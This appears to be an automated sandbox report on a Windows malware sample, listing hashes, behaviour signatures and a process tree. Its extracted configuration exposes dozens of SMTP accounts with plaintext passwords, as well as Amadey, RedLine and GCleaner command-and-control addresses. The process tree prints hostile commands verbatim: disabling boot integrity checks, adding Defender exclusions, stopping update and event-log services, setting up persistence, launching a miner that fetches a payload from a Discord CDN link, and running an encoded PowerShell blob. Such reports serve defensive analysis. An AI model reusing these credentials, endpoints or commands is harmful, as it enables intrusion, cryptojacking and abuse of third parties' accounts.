Resubmissions
14-05-2024 20:58
240514-zsfmfsgb6s 1014-05-2024 20:53
240514-zplpasfh6x 1014-05-2024 19:25
240514-x4yajach28 10Analysis
-
max time kernel
132s -
max time network
1201s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
-
submitted
14-05-2024 20:53
General
-
Target
3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
-
Size
1.8MB
-
MD5
2307c3f2702a53fdc03bf2f05fe51a25
-
SHA1
5d31c179f4d5e0831fb5ad877fbfe8fe6b88a26d
-
SHA256
3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77
-
SHA512
14c7feba21ae7b6b3e3d1bf06a8dea88c784ba1e5e86ffd9724be66ef880bfb89c66ae5f906e1d7c9fc18635b892ec32255ecad57dd71c11d4e40a2f9922e6bf
-
SSDEEP
49152:VKrUl9aoaN6dMU27MyNw2e9ObxiFlWukA+dEoBpck6Co:VKrb6bmw2mOliFlWuQxpcN
Malware Config
Extracted
Protocol: smtp- Host:
mx.progiftstore.org - Port:
587 - Username:
[email protected] - Password:
eHdixiY321
Extracted
Protocol: smtp- Host:
mx.mannbdinfo.org - Port:
587 - Username:
[email protected] - Password:
9O2sw3bc
Extracted
Protocol: smtp- Host:
mail.jlchacha.com - Port:
587 - Username:
[email protected] - Password:
chacha123
Extracted
Protocol: smtp- Host:
smtp.netzero.com - Port:
587 - Username:
[email protected] - Password:
dano67
Extracted
Protocol: smtp- Host:
autismplus.com.au - Port:
587 - Username:
[email protected]
Extracted
Protocol: smtp- Host:
smtp.netzero.net - Port:
587 - Username:
[email protected] - Password:
DEC1564
Extracted
Protocol: smtp- Host:
smtp.netzero.com - Port:
587 - Username:
[email protected] - Password:
Gto6766
Extracted
Protocol: smtp- Host:
mx.breakthur.com - Port:
587 - Username:
[email protected] - Password:
hYN2mU67!
Extracted
Protocol: smtp- Host:
mx.giochi0.it - Port:
587 - Username:
[email protected] - Password:
Barcellona28
Extracted
Protocol: smtp- Host:
smtp.nifty.ne.jp - Port:
587 - Username:
[email protected] - Password:
19711229
Extracted
Protocol: smtp- Host:
mx.breakthur.com - Port:
587 - Username:
[email protected] - Password:
110110Jp
Extracted
Protocol: smtp- Host:
smtp.netzero.net - Port:
587 - Username:
[email protected] - Password:
eagle1
Extracted
Protocol: smtp- Host:
smtp.frontiernet.net - Port:
587 - Username:
[email protected] - Password:
gloria02151
Extracted
Protocol: smtp- Host:
smtp.netzero.net - Port:
587 - Username:
[email protected] - Password:
Taylor5bob
Extracted
Protocol: smtp- Host:
mx.nikeshoesoutletforsale.com - Port:
587 - Username:
[email protected] - Password:
dsfsdfede2022
Extracted
Protocol: smtp- Host:
mx.gcdetectivefree.com - Port:
587 - Username:
[email protected] - Password:
Parola12
Extracted
Protocol: smtp- Host:
smtp.terre-net.fr - Port:
587 - Username:
[email protected] - Password:
s2l81290
Extracted
Protocol: smtp- Host:
mx.fkksol.com - Port:
587 - Username:
[email protected] - Password:
Cucuzq7p
Extracted
Protocol: smtp- Host:
mx.breakthur.com - Port:
587 - Username:
[email protected] - Password:
medomak4554!medomak4554!123
Extracted
Protocol: smtp- Host:
mx.websitebod.com - Port:
587 - Username:
[email protected] - Password:
tTisf7i32wy
Extracted
Protocol: smtp- Host:
smtp.netzero.net - Port:
587 - Username:
[email protected] - Password:
rideboard1
Extracted
Protocol: smtp- Host:
void.blackhole.mx - Port:
587 - Username:
[email protected] - Password:
super6
Extracted
Protocol: smtp- Host:
hcmp.co.kr - Port:
587 - Username:
[email protected]
Extracted
Protocol: smtp- Host:
mx.websitebod.com - Port:
587 - Username:
[email protected] - Password:
eHdixiY
Extracted
Protocol: smtp- Host:
mx.uvvc.info - Port:
587 - Username:
[email protected] - Password:
663765335226
Extracted
Protocol: smtp- Host:
smtp.netzero.net - Port:
587 - Username:
[email protected] - Password:
barbbite
Extracted
Protocol: smtp- Host:
romanov.ca - Port:
587 - Username:
[email protected] - Password:
jasper
Extracted
Protocol: smtp- Host:
autismplus.com.au - Port:
587 - Username:
[email protected]
Extracted
Protocol: smtp- Host:
smtp.homtail.co.uk - Port:
587 - Username:
[email protected] - Password:
s1zzle
Extracted
Protocol: smtp- Host:
mx.breakthur.com - Port:
587 - Username:
[email protected] - Password:
4Jr4xr8ekq&
Extracted
Protocol: smtp- Host:
smtp.netzero.net - Port:
587 - Username:
[email protected] - Password:
honda91
Extracted
Protocol: smtp- Host:
mx.fkksol.com - Port:
587 - Username:
[email protected] - Password:
6YKeuo3A
Extracted
Protocol: smtp- Host:
hcmp.co.kr - Port:
587 - Username:
[email protected]
Extracted
Protocol: smtp- Host:
wightman.ca - Port:
587 - Username:
[email protected]
Extracted
Protocol: smtp- Host:
smtp.netzero.net - Port:
587 - Username:
[email protected] - Password:
Insanity1
Extracted
Protocol: smtp- Host:
smtp.frontier.com - Port:
587 - Username:
[email protected] - Password:
Loukasd12
Extracted
Protocol: smtp- Host:
mail.jbc.co.jp - Port:
587 - Username:
[email protected] - Password:
Take0912
Extracted
Protocol: smtp- Host:
mx.ertemaik.com - Port:
587 - Username:
[email protected] - Password:
zq15VjBo
Extracted
amadey
4.20
http://5.42.96.7
-
install_dir
7af68cdb52
-
install_file
axplons.exe
-
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
-
url_paths
/zamo7h/index.php
Extracted
redline
1
185.215.113.67:26260
Extracted
gcleaner
185.172.128.90
5.42.64.56
5.42.65.64
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Detect ZGRat V1 1 IoCs
-
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 12 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
-
Windows security bypass 2 TTPs 7 IoCs
-
ZGRat
ZGRat is remote access trojan written in C#.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
-
Modifies boot configuration data using bcdedit 14 IoCs
-
XMRig Miner payload 9 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
-
Contacts a large (764) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 42 IoCs
-
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 60 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 25 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Windows security modification 2 TTPs 7 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
-
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Program Files directory 15 IoCs
-
Drops file in Windows directory 8 IoCs
-
Launches sc.exe 20 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
GoLang User-Agent 25 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Kills process with taskkill 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 5 IoCs
-
Modifies system certificate store 2 TTPs 15 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 36 IoCs
-
Suspicious use of FindShellTrayWindow 10 IoCs
-
Suspicious use of SendNotifyMessage 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe"C:\Users\Admin\AppData\Local\Temp\3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 1164⤵
- Loads dropped DLL
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 524⤵
- Loads dropped DLL
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exeSc stop GameServerClient5⤵
- Launches sc.exe
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameServerClient confirm5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\sc.exeSc delete GameSyncLink5⤵
- Launches sc.exe
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameSyncLink confirm5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start GameSyncLink5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "4⤵
-
C:\Windows\SysWOW64\sc.exeSc stop GameServerClientC5⤵
- Launches sc.exe
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameServerClientC confirm5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\sc.exeSc delete PiercingNetLink5⤵
- Launches sc.exe
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove PiercingNetLink confirm5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start PiercingNetLink5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "4⤵
-
C:\Windows\SysWOW64\sc.exeSc delete GameSyncLinks5⤵
- Launches sc.exe
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameSyncLinks confirm5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start GameSyncLinks5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 524⤵
- Loads dropped DLL
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2536 -s 524⤵
- Loads dropped DLL
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe"C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "dl.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe" & exit5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "dl.exe" /f6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"5⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER8⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:8⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:8⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows8⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe8⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe8⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 08⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn8⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 18⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}8⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast8⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 08⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}8⤵
- Modifies boot configuration data using bcdedit
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v7⤵
- Modifies boot configuration data using bcdedit
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe7⤵
- Executes dropped EXE
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:807⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe7⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:807⤵
-
C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe"C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
- Drops file in Windows directory
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WSNKISKT"5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WSNKISKT"5⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"3⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBl